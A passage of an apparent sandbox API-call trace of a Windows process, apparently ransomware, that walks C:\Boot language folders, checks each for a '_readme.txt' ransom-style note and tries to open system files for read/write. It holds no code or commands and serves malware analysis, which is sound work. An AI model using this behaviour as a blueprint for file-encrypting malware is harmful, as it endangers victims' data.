[0093.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.046] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.047] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.047] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0093.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.047] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99c9c68 [0093.047] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0093.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.047] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0093.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.047] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.047] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.048] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.048] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.048] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0093.048] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.048] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.048] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned=".txt" [0093.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.048] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.048] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.048] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.048] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.048] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.048] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.049] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.050] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.050] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.051] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.051] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0093.051] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.051] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.051] PathFindFileNameW (pszPath="") returned="" [0093.051] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.052] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.052] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.052] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.052] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0093.052] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.052] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0093.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.052] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.052] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.053] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.053] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.053] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.053] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.053] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0093.053] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.053] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.053] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.053] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.053] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned=".txt" [0093.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.053] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.053] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.053] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.053] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.053] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.053] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.053] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.053] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.054] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 